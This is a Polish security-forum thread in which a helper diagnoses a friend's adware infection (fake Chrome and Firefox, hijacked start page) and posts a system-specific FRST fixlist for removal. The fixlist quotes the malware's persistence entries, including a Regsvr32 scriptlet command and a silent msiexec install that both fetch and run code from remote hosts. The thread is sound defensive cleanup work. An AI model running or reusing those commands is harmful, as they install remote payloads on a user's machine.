Clear Opublikowano 24 Kwietnia 2017 Zgłoś Udostępnij Opublikowano 24 Kwietnia 2017 Witam, Znajomy poprosił mnie o pomoc z usunięciem problemów na jego komputerze. Została zainstalowana aplikacja Lucky Starting była główna strona startowa w FF i Chrome , najprawdopodobniej także inne warianty podobnych zagrożeń. Twierdzi także, ze FF miał zostać doinstalowany samodzielnie Objawy: - fałszywy Chrome, wolno startujący system, wzmożona ilość reklam, przekierowywanie na inne strony internetowe, w tym wyszukiwarki, niedziałające wtyczki. Podejrzewam, że źródłem problemu mogą być strony porno. Logi:FRST nie był w stanie dokonać kopii rejestru - wyskoczylo kilka bledow o braku dostępu do kluczy rejestru. W systemie został zainstalowany przeze mnie TeamViewer w dniu dzisiejszym, celem dokończenia procesu sprawdzania systemu już zdalnie ze swojego domu. Addition.txt FRST.txt Shortcut.txt GMER.txt Odnośnik do komentarza
Miszel03 Opublikowano 25 Kwietnia 2017 Zgłoś Udostępnij Opublikowano 25 Kwietnia 2017 System jest zainfekowany przez adware. Widoczne są dwie fałszywe wyszukiwarki podszywające się pod Google Chrome oraz Mozilla FireFox (której nawet nie ma zainstalowanej w systemie). Oprócz tego inne adware: uruchamiające strony w przeglądarce, nakładające blokady typu Debugger etc. W systemie sprzątam, kasuję infekcję, resztki po programach i czyszczę pliki tymczasowe. Instalkę z DobrychProgramów mającą Asystena Pobierania kasuję z katalogu Pobrane. Ten instalator ma zintegrowane adware i kto wie czy to właśnie nie on doprowadził do infekcji - KLIK. 1. Otwórz Notatnik w nim wklej: CloseProcesses: CreateRestorePoint: HKU\S-1-5-21-2487835237-2257990825-3517168332-1001\...\ChromeHTML: -> C:\Program Files (x86)\Hotben\Application\chrome.exe (Google Inc.) RemoveDirectory: C:\Program Files (x86)\Hotben RemoveDirectory: C:\Users\Janusz\AppData\Local\Hotben Task: {0799A11B-BBCE-415E-8524-1C733F6F6689} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> Brak pliku Task: {2524CC03-F09A-46EF-892D-6174963B19D8} - \WPD\SqmUpload_S-1-5-21-2487835237-2257990825-3517168332-1001 -> Brak pliku Task: {44AF63F8-B7C5-4730-95AD-D0365E220B1F} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> Brak pliku Task: {77F28D2F-FA47-4C2C-B721-7C270588F307} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> Brak pliku Task: {9BF3A04E-404B-433E-A4D6-788369AFB24C} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> Brak pliku Task: {B9962562-7BA3-446C-8C2D-1001B91445AE} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> Brak pliku Task: {F0B467EC-C9B6-4E2A-8020-CDD154D3C6BD} - System32\Tasks\PowerWord-SCT-JT => Regsvr32.exe /s /i:hxxp://point.lotusiloveyou.com/?data=zDlkMj1QMkZWNTYcRTI1FjE8N8E4MdQYM8UcMYU1MThQM8MdNq== scrobj.dll C:\Users\Janusz\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk C:\Users\Janusz\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk C:\Users\Public\Desktop\Google Chrome.lnk FirewallRules: [{F2A4227C-2518-4FD8-8BF8-7B4F21DDD335}] => (Allow) C:\Program Files (x86)\Hotben\Application\chrome.exe FirewallRules: [{A21039B9-F973-45F9-9E02-6D0CAA4F2841}] => (Allow) C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe FirewallRules: [{AA08C75C-F2DB-4174-B872-5B02748EAF9E}] => (Allow) C:\Program Files (x86)\Firefox\Firefox.exe RemoveDirectory: C:\Program Files (x86)\Firefox RemoveDirectory: C:\Users\Janusz\AppData\Local\Firefox RemoveDirectory: C:\Users\Janusz\AppData\Roaming\Firefox R2 FirefoxU; C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe [117424 2017-04-18] () HKU\S-1-5-21-2487835237-2257990825-3517168332-1001\...\Policies\system: [shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=zDlkMj1QMkZWNTYcRTI1FjE8N8E4MdQYM8UcMYU1MThQM8MdNq== /q IFEO\taskmgr.exe: [Debugger] SearchScopes: HKU\S-1-5-21-2487835237-2257990825-3517168332-1001 -> DefaultScope {32B7ACE0-EDCA-4E79-B5E3-263115A9A6F8} URL = SearchScopes: HKU\S-1-5-21-2487835237-2257990825-3517168332-1001 -> {32B7ACE0-EDCA-4E79-B5E3-263115A9A6F8} URL = HKU\S-1-5-21-2487835237-2257990825-3517168332-1001\...\StartMenuInternet\ChromeHTML: -> C:\Program Files (x86)\Hotben\Application\chrome.exe (Google Inc.) U2 Kitty; C:\Users\Janusz\AppData\Local\Kitty\Kitty.dll [754688 2017-04-17] (kitty.exe) [brak podpisu cyfrowego] R2 WindowsAppVerifierSvr; C:\ProgramData\Windows\App\Kit\ApplicationVerifier.dll [107008 2017-04-18] () [brak podpisu cyfrowego] S2 HWDeviceService64.exe; "C:\ProgramData\DatacardService\HWDeviceService64.exe" -/service [X] U3 ugldipob; C:\Users\Janusz\AppData\Local\Temp\ugldipob.sys [56584 2017-04-24] (GMER) [brak podpisu cyfrowego] S3 ew_hwusbdev; \SystemRoot\system32\DRIVERS\ew_hwusbdev.sys [X] S3 ew_usbenumfilter; \SystemRoot\System32\drivers\ew_usbenumfilter.sys [X] S3 huawei_cdcacm; \SystemRoot\system32\DRIVERS\ew_jucdcacm.sys [X] S3 huawei_ext_ctrl; \SystemRoot\System32\drivers\ew_juextctrl.sys [X] S3 huawei_wwanecm; \SystemRoot\System32\drivers\ew_juwwanecm.sys [X] 2017-04-06 12:42 - 2017-04-06 12:42 - 01255768 _____ ( ) C:\Users\Janusz\Downloads\Skype-13018-AsystentPobierania.exe C:\Users\Janusz\AppData\Local\Microsoft\Windows\Application Shortcuts\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\Microsoft.WindowsLive.Calendar.lnk C:\Users\Janusz\AppData\Local\Microsoft\Windows\Application Shortcuts\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\Microsoft.WindowsLive.Mail.lnk C:\Users\Janusz\AppData\Local\Microsoft\Windows\Application Shortcuts\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\Microsoft.WindowsLive.People.lnk C:\Users\Janusz\AppData\Local\Microsoft\Windows\Application Shortcuts\Microsoft.Studios.PinballFx2_8wekyb3d8bbwe\Pinball.App.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk C:\Users\Janusz\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.lnk C:\Users\Public\Desktop\Mozilla Firefox.lnk DeleteKey: HKCU\Software\Mozilla DeleteKey: HKCU\Software\MozillaPlugins DeleteKey: HKLM\SOFTWARE\Mozilla DeleteKey: HKLM\SOFTWARE\MozillaPlugins DeleteKey: HKLM\SOFTWARE\Wow6432Node\Mozilla DeleteKey: HKLM\SOFTWARE\Wow6432Node\mozilla.org DeleteKey: HKLM\SOFTWARE\Wow6432Node\MozillaPlugins C:\Users\Janusz\AppData\Local\Mozilla C:\Users\Janusz\AppData\Roaming\Mozilla C:\Users\Janusz\AppData\Roaming\Profiles EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt w folderze z którego uruchamiasz FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 2. Wyczyść i zabezpiecz przeglądarkę Google Chrome: Zresetuj synchronizację (o ile włączona): KLIK. Ustawienia > karta Rozszerzenia > odinstaluj wszystkie nieznane i niepotrzebne Ci rozszerzenia. Ustawienia > karta Ustawienia > Pokaż ustawienia zaawansowane > zjedź na sam spód i uruchom opcję Resetowanie ustawień. Zakładki i hasła nie zostaną naruszone. Ustawienia > karta Ustawienia > sekcja Szukaj > klik w Zarządzanie wyszukiwarkami > skasuj z listy wszystko z wyjątkiem Google. Ustaw tą lub jakąkolwiek inną zaufaną przeglądarkę jako domyślną - skromnie sugeruję Google Chrome - KLIK. Zainstaluj rozszerzenie blokujące reklamy o podłożu nieinfekcyjnym, polecam rozszerzenie uBlock Origin. 4. Uruchom FRST, w polu Szukaj (Search) wklej poniższą frazę i kliknij w Szukaj w rejestrze (Search Registry). hotben;firefox Obok FRST powstanie raport SearchReg.txt - zaprezentuj go na forum. 5. Pobierz AdwCleaner uruchom go i kliknij Skanuj, kiedy skanowanie zakończy się wydobądź z niego raport, znajduję się on w folderze C:\AdwCleaner. Raport zaprezentuj na forum. 6. Zrób nowy log FRST z opcji Skanuj (Scan) wraz z Addition i Shortcut. Dołącz też plik fixlog.txt. Odnośnik do komentarza
Clear Opublikowano 25 Kwietnia 2017 Autor Zgłoś Udostępnij Opublikowano 25 Kwietnia 2017 Odnośnie do punktu 5, po pobraniu aplikacji AdwCleaner i uruchomieniu, pojawił się komunikat o nieaktualności aplikacji. Z uwagi na to, że czasami starsze wersje programu działają lepiej od nowych, a ja od sporego czasu nie jestem na bieżąco, postanowiłem korzystać z wersji programu, do której linkowano (6.045). AdwCleaner znalazł 20 zagrożeń. W wynikach wyszły 2 ścieżki. Jeśli program winien się zaktualizować, proszę o informację. Jako domyślną przeglądarkę, na tę chwilę ustawiłem Microsoft Edge, która jest najbezpieczniejszym rozwiązaniem do momentu usunięcia infekcji. Załączam logi. Punkt 2 - Chrome uruchomiłem bezporednio z lokalizacji właściwej przeglądarki. Nie było zainstalowanych podejrzanych dodatków i wyszukiwarek (przed daniem pierwszych logów była tylko Yahoo, a strona startowa luckystarting - usunięte). Zresetowano, usunięto wszystkie wyszukiwarki poza google i dodatki, zainstalowano uBlock Origin zamiast posiadanego wcześniej Adblocka Plus. na taskbarze (quickLaunch) nadal są skróty do aplikacji Firefox i Chrome Addition.txt AdwCleanerS1.txt Fixlog.txt Shortcut.txt FRST.txt Odnośnik do komentarza
Rekomendowane odpowiedzi
Jeśli chcesz dodać odpowiedź, zaloguj się lub zarejestruj nowe konto
Jedynie zarejestrowani użytkownicy mogą komentować zawartość tej strony.
Zarejestruj nowe konto
Załóż nowe konto. To bardzo proste!
Zarejestruj sięZaloguj się
Posiadasz już konto? Zaloguj się poniżej.
Zaloguj się